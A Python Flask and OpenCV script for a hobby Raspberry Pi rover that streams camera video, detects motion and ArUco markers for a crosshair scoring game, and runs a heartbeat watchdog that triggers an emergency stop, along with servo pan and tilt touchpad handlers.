##jwc o from camera import Camera_File
# Default to most sophisticated tech
from camera_OpenCv_File import camera_Cl
print("*** DEBUG: Camera: camera_opencv")
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
##jwc o from pyimagesearch.motion_detection import singleMotionDetector_Cl
from motion_detection.singleMotionDetector_File import singleMotionDetector_Cl
from imutils.video import VideoStream
import threading
import argparse
import datetime
import imutils
import time
import cv2
from collections import defaultdict
##jwc 2.1
##
# define names of each possible ArUco tag OpenCV supports
ARUCO_DICT = {
"DICT_4X4_50": cv2.aruco.DICT_4X4_50,
"DICT_4X4_100": cv2.aruco.DICT_4X4_100,
"DICT_4X4_250": cv2.aruco.DICT_4X4_250,
"DICT_4X4_1000": cv2.aruco.DICT_4X4_1000,
"DICT_5X5_50": cv2.aruco.DICT_5X5_50,
"DICT_5X5_100": cv2.aruco.DICT_5X5_100,
"DICT_5X5_250": cv2.aruco.DICT_5X5_250,
"DICT_5X5_1000": cv2.aruco.DICT_5X5_1000,
"DICT_6X6_50": cv2.aruco.DICT_6X6_50,
"DICT_6X6_100": cv2.aruco.DICT_6X6_100,
"DICT_6X6_250": cv2.aruco.DICT_6X6_250,
"DICT_6X6_1000": cv2.aruco.DICT_6X6_1000,
"DICT_7X7_50": cv2.aruco.DICT_7X7_50,
"DICT_7X7_100": cv2.aruco.DICT_7X7_100,
"DICT_7X7_250": cv2.aruco.DICT_7X7_250,
"DICT_7X7_1000": cv2.aruco.DICT_7X7_1000,
"DICT_ARUCO_ORIGINAL": cv2.aruco.DICT_ARUCO_ORIGINAL,
"DICT_APRILTAG_16h5": cv2.aruco.DICT_APRILTAG_16h5,
"DICT_APRILTAG_25h9": cv2.aruco.DICT_APRILTAG_25h9,
"DICT_APRILTAG_36h10": cv2.aruco.DICT_APRILTAG_36h10,
"DICT_APRILTAG_36h11": cv2.aruco.DICT_APRILTAG_36h11
}
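# Minimal usage sketch for the table above, assuming the same legacy cv2.aruco
# API used later in this file (Dictionary_get / drawMarker, as exposed by older
# opencv-contrib builds):
#
#   tag_dict = cv2.aruco.Dictionary_get(ARUCO_DICT["DICT_6X6_100"])
#   tag_img  = cv2.aruco.drawMarker(tag_dict, 7, 200)   # 200x200 px tag with ID 7
#   cv2.imwrite("tag_6x6_100_id7.png", tag_img)
#
# Printing a few such tags is a quick way to exercise detectMarkers() below.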
##jwc 2.0
##
# initialize the output frame and a lock used to ensure thread-safe
# exchanges of the output frames (useful when multiple browsers/tabs
# are viewing the stream)
outputFrame = None
lock = threading.Lock()
score_Targeted_Dict = defaultdict(int)
##jwc y score_Targeted_ClosenessToVideoCenter_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict = defaultdict(int)
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict = defaultdict(int)
##jwc o # initialize a flask object
##jwc o app_Cl_Ob = Flask(__name__)
# initialize the video stream and allow the camera sensor to
# warmup
#videoStream_Cl_Ob = VideoStream(usePiCamera=1).start()
print("[INFO] starting video stream...")
videoStream_Cl_Ob = VideoStream(src=0).start()
time.sleep(2.0)
def detect_Motions_ARCHIVED_Fn(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global videoStream_Cl_Ob, outputFrame, lock
# initialize the motion detector and the total number of frames
# read thus far
motionDetect_Cl_Ob = singleMotionDetector_Cl(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it,
# convert the frame to grayscale, and blur it
frame = videoStream_Cl_Ob.read()
frame = imutils.resize(frame, width=400)
# jwc rotate 180-degrees to flip image, since cam is wrongly upside-down
##jwc not work as time stamp upside down: frame = imutils.rotate(frame, 180)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
# cv2.putText(frame, timestamp.strftime(
# "%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = motionDetect_Cl_Ob.detect(gray)
# check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
(thresh, (minX, minY, maxX, maxY)) = motion
cv2.rectangle(frame, (minX, minY), (maxX, maxY), (0, 0, 255), 2)
# update the background model and increment the total number
# of frames read thus far
motionDetect_Cl_Ob.update(gray)
total += 1
# acquire the lock, set the output frame, and release the
# lock
with lock:
outputFrame = frame.copy()
## jwc 2.1
##
# Generate 'outputFrame' for later client request
#
##jwc o def detect_Motions_ARCHIVED_Fn(frameCount):
def detect_Motions_And_ArucoMarkers_Fn(frameCount):
# grab global references to the video stream, output frame, and
# lock variables
global videoStream_Cl_Ob, outputFrame, lock
# initialize the motion detector and the total number of frames
# read thus far
motionDetect_Cl_Ob = singleMotionDetector_Cl(accumWeight=0.1)
total = 0
# loop over frames from the video stream
while True:
# read the next frame from the video stream, resize it,
# convert the frame to grayscale, and blur it
frame = videoStream_Cl_Ob.read()
##jwc o frame = imutils.resize(frame, width=400)
frame = imutils.resize(frame, width=1000)
video_Height, video_Width = frame.shape[:2] # float
##jwc n video_Width = camera_Cl.__getattribute__(cv2.CAP_PROP_FRAME_WIDTH) # float
##jwc n video_Height = camera_Cl.__getattribute__(cv2.CAP_PROP_FRAME_HEIGHT) # float
video_Center_X = int(video_Width/2)
video_Center_Y = int(video_Height/2)
video_Crosshair_RadiusLength = 200
crosshairs_Line_Thickness = 8
target_Line_thickness = 4
print("*** *** DEBUG: video_Width: " + str(video_Width) + " video_Height: " + str(video_Height) + " video_Center_X: " + str(video_Center_X) + " video_Center_Y: " + str(video_Center_Y))
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# * Detect ArUco Markers: Adrian Rosebrock
#
# detect ArUco markers in the input frame
(corners, ids, rejected) = cv2.aruco.detectMarkers(frame, arucoDict, parameters=arucoParams)
# * Setup Context-Based Color-Scheme
# * Color = (B,G,R)
#
if (config_Global_File.servo_03_Degrees < 180):
# * Arm not in Standby/Neutral/Safety: Max_180 Position, Thus Cam Inactive: Not in viewer mode: Black >> Grey
#
##jwc: crosshairs_Color_BGR_Tuple_ActivatedNot = (255, 255, 255)
##jwc: crosshairs_Color_BGR_Tuple_Activated = (255, 255, 255)
##jwc: target_Color_BGR_Tuple_ActivatedNot = (255, 255, 255)
##jwc; target_Color_BGR_Tuple_Activated = (255, 255, 255)
crosshairs_Color_BGR_Tuple_ActivatedNot = (0, 255, 255)
crosshairs_Color_BGR_Tuple_Activated = (0, 255, 255)
target_Color_BGR_Tuple_ActivatedNot = (0, 255, 255)
target_Color_BGR_Tuple_Activated = (0, 255, 255)
target_Color_BGR_Tuple_Activated_Friendly = (255, 0, 0) # Blue regardless of Arm-Position
cv2.putText(frame, 'Cam: Non-Active', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(frame, 'Arm: Set to Max_180', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
else:
# * Arm in Standby/Neutral/Safety: Max_180 Position, Thus Cam Active: In viewer mode: Green
#
crosshairs_Color_BGR_Tuple_ActivatedNot = (0, 255, 0)
crosshairs_Color_BGR_Tuple_Activated = (0, 0, 255)
target_Color_BGR_Tuple_ActivatedNot = (0, 255, 0)
target_Color_BGR_Tuple_Activated = (0, 0, 255)
target_Color_BGR_Tuple_Activated_Friendly = (255, 0, 0) # Blue regardless of Arm-Position
cv2.putText(frame, 'Cam: Active', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
cv2.putText(frame, 'Arm: Max_180', (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength + 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
# * Draw Crosshairs
# ** Draw Crosshairs after AI Image Detection
##jwc o cv2.rectangle(frame, (minX, minY), (maxX, maxY), (255, 255, 255), 2)
##jwc n cv2.rectangle(frame, ((video_Width/2)-50, (video_Height/2)-50), ((video_Width/2)+50, (video_Height/2)+50), (0, 255, 0), 2)
##jwc y cv2.rectangle(frame, (50, 50), (100, 100), (0, 0, 255), 2)
##jwc y cv2.rectangle(frame, (int(video_Width/2)-50, int(video_Height/2)-50), (int(video_Width/2)+50, int(video_Height/2)+50), (0, 255, 0), 2)
##jwc y cv2.rectangle(frame, (video_Center_X - video_Crosshair_RadiusLength, video_Center_Y - video_Crosshair_RadiusLength), (video_Center_X + video_Crosshair_RadiusLength, video_Center_Y + video_Crosshair_RadiusLength), (0, 255, 0), 2)
##jwc y cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, (0, 255, 0), 2)
cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_ActivatedNot, crosshairs_Line_Thickness)
# verify *at least* one ArUco marker was detected
if len(corners) > 0:
# flatten the ArUco IDs list
ids = ids.flatten()
# loop over the detected ArUCo corners
for (markerCorner, markerID) in zip(corners, ids):
# extract the marker corners (which are always returned
# in top-left, top-right, bottom-right, and bottom-left
# order)
corners = markerCorner.reshape((4, 2))
(topLeft, topRight, bottomRight, bottomLeft) = corners
# convert each of the (x, y)-coordinate pairs to integers
topRight = (int(topRight[0]), int(topRight[1]))
bottomRight = (int(bottomRight[0]), int(bottomRight[1]))
bottomLeft = (int(bottomLeft[0]), int(bottomLeft[1]))
topLeft = (int(topLeft[0]), int(topLeft[1]))
# compute and draw the center (x, y)-coordinates of the ArUco marker
cX = int((topLeft[0] + bottomRight[0]) / 2.0)
cY = int((topLeft[1] + bottomRight[1]) / 2.0)
##jwc o cv2.circle(frame, (cX, cY), 4, (0, 0, 255), -1)
cv2.circle(frame, (cX, cY), 10, (255, 0, 0), -1)
print("*** *** *** DEBUG: cX: " + str(cX) + " cY: " + str(cY))
target_DistanceToVideoCenter_Int = int(math.sqrt( (cX - video_Center_X)**2 + (cY - video_Center_Y)**2 ))
target_ScoreWeightedToVideoCenter_Int = video_Crosshair_RadiusLength - target_DistanceToVideoCenter_Int
##jwc o if math.sqrt( (cX - video_Center_X)**2 + (cY - video_Center_Y)**2 ) <= video_Crosshair_RadiusLength:
if target_DistanceToVideoCenter_Int <= video_Crosshair_RadiusLength:
##jwc y cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, color_BGR_Tuple, 4)
cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_Activated, crosshairs_Line_Thickness)
# Initialize/Reset for either Friendly or Enemy Targets
##NOT RESET HERE, DO CONDITIONALLY AT SENDING: config_Global_File._timer_Mission_Recharge_Sec_Int = 0
# Friendly Targets
# ArUco markers appear to be recognized more reliably on the inner part of the arm (vs. the outer part)
# A flat white margin is also very important; any curvature of the marker interferes with recognition.
# Only allow recharge if not waiting for last non-zero recharge to be sent to clients
if(markerID == 0 or markerID ==1):
# ASAP, Override Enemy-Borders with Friendly-Borders
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_Activated_Friendly, target_Line_thickness)
timer_Mission_Countdown_Expired_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC - config_Global_File._timer_Mission_Countdown_Sec
# Recharge threshold starts at a significant number of seconds
# Because requests arrive asynchronously on multiple threads, 'config_Global_File._timer_Mission_Countdown_Sec' may not be updated in time
# to prevent invalid double-dipping, so update it as soon as possible to close that timing loophole.
##jwc y if(timer_Mission_Countdown_Expired_Sec > int(0.10 * config_Global_File._timer_Mission_Duration_MAX_SEC)):
if(timer_Mission_Countdown_Expired_Sec > int(config_Global_File._timer_Mission_Recharge_THRESHOLD_DEC * config_Global_File._timer_Mission_Duration_MAX_SEC)):
config_Global_File._timer_Mission_Recharge_Sec_Int = timer_Mission_Countdown_Expired_Sec
# Do following asap to prevent multi-threading racing conflict
#
##jwc n config_Global_File._timer_Mission_Countdown_Sec += timer_Mission_Countdown_Expired_Sec
config_Global_File._timer_Mission_Start_Sec += config_Global_File._timer_Mission_Recharge_Sec_Int
config_Global_File._timer_Mission_Countdown_Sec = calculate__timer_Mission_Countdown_Sec__Fn( config_Global_File._timer_Mission_Duration_MAX_SEC, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec)
config_Global_File._timer_Mission_Reserves_Sec_Int -= config_Global_File._timer_Mission_Recharge_Sec_Int
##jwc y cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 30), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
cv2.putText(frame, 'Recharge: ' + str(config_Global_File._timer_Mission_Recharge_Sec_Int), (topLeft[0], topLeft[1] - 60), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
config_Global_File._timer_Mission_Recharge_Timestamp_Int = config_Global_File._timer_Mission_Now_Sec
print("*** *** *** ***")
print("*** *** *** *** DEBUG: Recharge: ", config_Global_File._timer_Mission_Recharge_Sec_Int, config_Global_File._timer_Mission_Recharge_Timestamp_Int, config_Global_File._timer_Mission_Countdown_Sec, config_Global_File._timer_Mission_Reserves_Sec_Int)
print("*** *** *** ***")
# Enemy Targets
else:
##jwc y color_BGR_Tuple = (0, 0, 255)
# draw the bounding box of the ArUCo detection
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_Activated, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_Activated, target_Line_thickness)
# Enemy Targets
if(config_Global_File.servo_03_Degrees == 180):
score_Targeted_Dict[str(markerID)] += 1
##jwc y score_Targeted_ClosenessToVideoCenter_Dict[str(target_DistanceToVideoCenter_Int)] += 1
score_Targeted_WeightedToVideoCenter_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
print("*** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_Dict= " + str(score_Targeted_Dict))
print("*** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_Dict= " + str(score_Targeted_WeightedToVideoCenter_Dict))
if(config_Global_File._trigger_Client_Req_01_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_01_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict))
if(config_Global_File._trigger_Client_Req_02_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_02_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict))
if(config_Global_File._trigger_Client_Req_03_Bool):
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict[str(target_ScoreWeightedToVideoCenter_Int)] += 1
config_Global_File._trigger_Client_Req_03_Bool = False
print("*** *** *** *** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict= " + str(score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict))
else:
##jwc y color_BGR_Tuple = (0, 255, 0)
# draw the bounding box of the ArUCo detection
cv2.line(frame, topLeft, topRight, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, topRight, bottomRight, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, bottomRight, bottomLeft, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
cv2.line(frame, bottomLeft, topLeft, target_Color_BGR_Tuple_ActivatedNot, target_Line_thickness)
##jwc ? cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, color_BGR_Tuple, 2)
##jwc ? cv2.circle(frame, (video_Center_X, video_Center_Y), video_Crosshair_RadiusLength, crosshairs_Color_BGR_Tuple_ActivatedNot, 4)
# draw the ArUco marker ID on the frame
# * Marker ID: Red Color
##jwc o cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)
# https://www.geeksforgeeks.org/python-opencv-cv2-puttext-method/
# * LineTypes: Recommended: LINE_AA = antialiased line
cv2.putText(frame, str(markerID), (topLeft[0], topLeft[1] - 15), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 255), 2, cv2.LINE_AA)
print("*** DEBUG: /detect_Motions_And_ArucoMarkers_Fn: markerID=" + str(markerID) + " markerID%10=" + str(markerID % 10))
##jwc o 2.1 # show the output frame
##jwc o 2.1 cv2.imshow("Frame", frame)
# Reset _trigger_Client
# End of Cpu-Cycle, so clear flags to false (esp. when true, yet nothing to process)
config_Global_File._trigger_Client_Req_01_Bool = False
config_Global_File._trigger_Client_Req_02_Bool = False
config_Global_File._trigger_Client_Req_03_Bool = False
# * Borrowed from 'detect_Motions_ARCHIVED_Fn()'
#
# jwc rotate 180-degrees to flip image, since cam is wrongly upside-down
##jwc not work as time stamp upside down: frame = imutils.rotate(frame, 180)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
##jwc m frame = imutils.rotate(frame, 180)
# grab the current timestamp and draw it on the frame
timestamp = datetime.datetime.now()
# cv2.putText(frame, timestamp.strftime(
# "%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10),
# cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# * Date Stamp: Green Color
# * https://www.geeksforgeeks.org/python-opencv-cv2-puttext-method/
# * LineTypes: Recommended: LINE_AA = antialiased line
##jwc o cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
cv2.putText(frame, timestamp.strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 255, 0), 2, cv2.LINE_AA)
##jwc m # jwc Frame is originally right-side up, yet timestamp-print is upside down
##jwc m # So, flip upside down before timestamp-print, then re-flip after
##jwc m frame = imutils.rotate(frame, 180)
# if the total number of frames has reached a sufficient
# number to construct a reasonable background model, then
# continue to process the frame
if total > frameCount:
# detect motion in the image
motion = motionDetect_Cl_Ob.detect(gray)
# check to see if motion was found in the frame
if motion is not None:
# unpack the tuple and draw the box surrounding the
# "motion area" on the output frame
# ** Use Less-Strong Yellow Color
(thresh, (minX, minY, maxX, maxY)) = motion
##jwc y cv2.rectangle(frame, (minX, minY), (maxX, maxY), (0, 255, 255), 2)
cv2.rectangle(frame, (minX, minY), (maxX, maxY), (127, 127, 127), 2)
# update the background model and increment the total number
# of frames read thus far
motionDetect_Cl_Ob.update(gray)
total += 1
# jwc Frame is originally right-side up, yet timestamp-print is upside down
# So, flip upside down before timestamp-print, then re-flip after
frame = imutils.rotate(frame, 180)
# acquire the lock, set the output frame, and release the
# lock
with lock:
outputFrame = frame.copy()
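# Worked example of the targeting math above (illustrative values only): with
# video_Crosshair_RadiusLength = 200, a video center at (500, 375) and a marker
# center at (cX, cY) = (560, 455):
#   target_DistanceToVideoCenter_Int      = int(sqrt(60**2 + 80**2)) = 100
#   target_ScoreWeightedToVideoCenter_Int = 200 - 100                = 100
# so markers closer to the crosshair center earn a higher weighted score.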
# Return generated 'outputFrame' for current client request
def generate():
# grab global references to the output frame and lock variables
global outputFrame, lock
# loop over frames from the output stream
while True:
# wait until the lock is acquired
with lock:
# check if the output frame is available, otherwise skip
# the iteration of the loop
if outputFrame is None:
continue
# encode the frame in JPEG format: 'im(age) encode' = 'imencode'
(flag, encodedImage) = cv2.imencode(".jpg", outputFrame)
# ensure the frame was successfully encoded
if not flag:
continue
# yield the output frame in the byte format
yield(b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encodedImage) + b'\r\n')
import logging
log = logging.getLogger('werkzeug')
##jwc o log.setLevel(logging.ERROR)
log.setLevel(logging.INFO)
# jwc ~/01-Jwc/2020-1205-0640-RpiRover1-DayDevelops/RpiRover1-master/
# jwc 'sys.path.append('db')' does work, despite 'lint' not understanding the 'import'
sys.path.append('db')
import robotProperties_Db_Cl_File
DB = robotProperties_Db_Cl_File.robotProperties_Db_Cl()
dictionary_ReturnValues = DB.read_LeftRight_MotorTrim_Fn()
print("*** DEBUG: DB.read_LeftRight_MotorTrim_Fn: " + json.dumps( dictionary_ReturnValues ))
config_Global_File.left_motor_trim = dictionary_ReturnValues['L']
config_Global_File.right_motor_trim = dictionary_ReturnValues['R']
print ("*** DEBUG: DB: config_Global_File.left_motor_trim: " + str( config_Global_File.left_motor_trim ) + ", config_Global_File.right_motor_trim: " + str( config_Global_File.right_motor_trim ))
dictionary_ReturnValues = DB.read_Heartbeat_Freq_Fn()
print("*** DEBUG: DB.read_Heartbeat_Freq_Fn: " + json.dumps( dictionary_ReturnValues ))
config_Global_File.heartbeat_freq = dictionary_ReturnValues['H']
print ("*** DEBUG: DB: config_Global_File.heartbeat_freq: " + str( config_Global_File.heartbeat_freq ))
##jwc yo app_Cl_Ob = Flask(__name__)
app_Cl_Ob = Flask(__name__, static_url_path='/static')
@app_Cl_Ob.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
# jwc 2020-1223 AiCam 2.0 StreamVideoToWebBrowser-AdrianRosebrock
#
@app_Cl_Ob.route("/video_feed")
def video_feed():
# return the response generated along with the specific media
# type (mime type)
return Response(generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
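# The multipart/x-mixed-replace response keeps one HTTP connection open and
# replaces the image with each new JPEG part yielded by generate(), so the
# template can simply point an <img src="/video_feed"> tag at this route.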
# General functions for internal-server use only
#
# Immobilizes system (chocks on) after 'timeout' seconds
def watchdog_timer():
while config_Global_File._watchdog_Server_Control_C_Inactive_Bool:
# jwc: Pauses every 1sec
##jwc o time.sleep(1)
##jwc
##jwc y decrease for more real-time stats: time.sleep(5)
##jwc still too long: time.sleep(1)
##jwc time.sleep(.10)
##jwc y realize this not affect HUD Stats, so keep as is to prevent premature disconnect
time.sleep(5) ## 5 sec pause, frequency
if config_Global_File._watchdog_EmergencyStop_Inactive_Bool:
config_Global_File._watchdog_Cycles_SinceLastConnect_Now += 1
##jwc print("*** DEBUG: config_Global_File._watchdog_Cycles_SinceLastConnect_Now: " + str(config_Global_File._watchdog_Cycles_SinceLastConnect_Now))
# jwc: appears that more than 10 sec without a heartbeat means a bad disconnect,
# so engage 'chocks'/disable the bot, if not already done
##jwc o if config_Global_File._watchdog_Cycles_SinceLastConnect_Now > config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and not config_Global_File.chocks:
if config_Global_File._watchdog_Cycles_SinceLastConnect_Now >= config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and not config_Global_File.chocks:
emergencyStop_On_Fn()
##jwc o if config_Global_File._watchdog_Cycles_SinceLastConnect_Now <= config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and config_Global_File.chocks:
if config_Global_File._watchdog_Cycles_SinceLastConnect_Now < config_Global_File._watchdog_Cycles_SinceLastConnect_MAX and config_Global_File.chocks:
emergencyStop_Off_Fn()
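# Timing note: the loop wakes every 5 seconds, so the effective disconnect
# timeout is roughly _watchdog_Cycles_SinceLastConnect_MAX * 5 seconds (e.g. an
# assumed MAX of 2 trips the emergency stop after ~10 s without a heartbeat,
# matching the "more than 10 sec" observation above).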
# Handler for a clean shutdown when pressing Ctrl-C
def signal_handler(signal, frame):
io_Driver_File.light_blue_blink(0.1)
config_Global_File._watchdog_Server_Control_C_Inactive_Bool = False
config_Global_File.camera_active = False
brakes_on()
# jwc: Wait until thread terminates
watchDog.join()
##jwc o http_server.close()
io_Driver_File.light_blue_off()
sys.exit(0)
# Handler for explorer-hat touchpads
def touch_handler(channel, event):
if channel == 1:
#jwc o
# config_Global_File.blue = not config_Global_File.blue
# if config_Global_File.blue:
# io_Driver_File.light_blue_on()
# io_Driver_File.output_one_on()
# else:
# io_Driver_File.light_blue_off()
# io_Driver_File.output_one_off()
##jwc n AttributeError: servo_01_Pan = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositiionGet_Fn()
##jwc n config_Global_File.servo_01_Pan_Degrees = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositionGet_Fn()
config_Global_File.servo_01_Pan_Degrees = config_Global_File.servo_01_Pan_Degrees - 10
if config_Global_File.servo_01_Pan_Degrees < 0:
config_Global_File.servo_01_Pan_Degrees = 0
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: S1: servo: pan: " + str(config_Global_File.servo_01_Pan_Degrees))
if channel == 2:
#jwc o
# config_Global_File.yellow = not config_Global_File.yellow
# if config_Global_File.yellow:
# io_Driver_File.light_yellow_on()
# io_Driver_File.output_two_on()
# else:
# io_Driver_File.light_yellow_off()
# io_Driver_File.output_two_off()
##jwc n AttributeError: servo_01_Pan = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositiionGet_Fn()
##jwc n config_Global_File.servo_01_Pan_Degrees = autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_PositionGet_Fn()
config_Global_File.servo_01_Pan_Degrees = config_Global_File.servo_01_Pan_Degrees + 10
if config_Global_File.servo_01_Pan_Degrees > 180:
config_Global_File.servo_01_Pan_Degrees = 180
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: S1: servo: pan: " + str(config_Global_File.servo_01_Pan_Degrees))
if channel == 3:
config_Global_File.chocks = not config_Global_File.chocks
# jwc: Chocks set to True: Admin Lock
if config_Global_File.chocks:
# jwc: Since Motors not free to operate, Watchdog not needed
config_Global_File._watchdog_EmergencyStop_Inactive_Bool = False
emergencyStop_On_Fn()
# jwc: Chocks set to False: Admin Unlock
else:
# jwc: Since Motors are free to operate, Watchdog is needed
config_Global_File._watchdog_EmergencyStop_Inactive_Bool = True
emergencyStop_Off_Fn()
if channel == 4:
io_Driver_File.light_green_blink(0.1)
#jwc o
# config_Global_File.green = True
# ##jwc o time.sleep(5)
# if config_Global_File.chocks:
# io_Driver_File.light_green_on()
# ##jwc o os.system("sudo -s shutdown -h now")
# else:
# io_Driver_File.light_green_off()
# config_Global_File.green = False
##jwc n config_Global_File.temp = autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()
##jwc n
# servoCam02Tilt = servoCam02Tilt + 10
# autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( servoCam02Tilt )
# print("*** DEBUG: S2: servo: tilt: " + str(autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()))
config_Global_File.servo_02_Tilt_Degrees = config_Global_File.servo_02_Tilt_Degrees - 10
if config_Global_File.servo_02_Tilt_Degrees < 0:
config_Global_File.servo_02_Tilt_Degrees = 0
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: S2: servo: tilt: " + str(config_Global_File.servo_02_Tilt_Degrees))
if channel == 5:
io_Driver_File.light_green_blink(0.1)
#jwc o
# config_Global_File.green = True
# ##jwc o time.sleep(5)
# if config_Global_File.chocks:
# io_Driver_File.light_green_on()
# ##jwc o os.system("sudo -s shutdown -h now")
# else:
# io_Driver_File.light_green_off()
# config_Global_File.green = False
